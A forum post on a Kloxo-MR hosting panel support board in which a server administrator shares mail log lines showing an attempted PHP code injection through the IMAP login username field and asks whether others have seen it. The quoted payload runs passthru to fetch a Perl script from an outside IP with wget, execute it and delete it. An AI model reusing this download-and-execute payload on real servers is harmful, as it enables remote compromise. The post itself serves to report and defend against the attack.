Sponsor:

Server and Web Integrator
Link:
Kloxo-MR logo
6.5.0 or 7.0.0
Click for "How to install"
Donation/Sponsorship:
Kloxo-MR is open-source.
Donate and or Sponsorship always welcome.
Click to:
Click Here
Please login or register. 2024-04-25, 08:49:52

Author Topic: Potential Perl malware?  (Read 1519 times)

0 Members and 1 Guest are viewing this topic.

Offline fossxplorer

  • Master
  • **
  • Posts: 640
  • Karma: +1/-0
    • View Profile
Potential Perl malware?
« on: 2015-11-23, 21:04:01 »
Today i noticed the following:

Nov 23 20:47:31 mail imap4: INFO: LOGIN FAILED, user=<?php passthru("cd /tmp;wget http://188.138.41.134/mad.exe;perl /tmp/mad.exe;perl mad.exe;rm -rf mad.exe"); ?>, ip=[127.0.0.1]
Nov 23 20:47:36 mail imap4: INFO: LOGIN FAILED, user=<?php passthru("cd /tmp;wget http://188.138.41.134/mad.exe;perl /tmp/mad.exe;perl mad.exe;rm -rf mad.exe"); ?>, ip=[127.0.0.1]
Nov 23 20:47:36 mail authlib: user invalid <?php passthru("cd
Nov 23 20:47:42 mail authlib: user invalid <?php passthru("cd
Nov 23 20:47:42 mail imap4: INFO: LOGIN FAILED, user=<?php passthru("cd /tmp;wget http://188.138.41.134/mad.exe;perl /tmp/mad.exe;perl mad.exe;rm -rf mad.exe"); ?>, ip=[127.0.0.1]
Nov 23 20:47:47 mail imap4: INFO: LOGOUT, ip=[127.0.0.1], rcvd=434, sent=388
Nov 23 20:47:47 mail imap4: tcpserver: end 20600 status 0
Nov 23 20:47:47 mail imap4: tcpserver: status: 0/40

The Perl script is at http://188.138.41.134/mad.exe.
i've blocked this IP in CSF, but still i see those lines in the maillog.

Anyone else seen this? It's obviously injecting PHP code through mail server.
Kloxo-MR!

 


Top 10 Social Networking:    Facebook    Twitter    LinkedIn    Pinterest    Google Plus    Tumblr    Instagram    VK    Flickr    Vine
Click Here

Page created in 0.063 seconds with 21 queries.

web stats analysis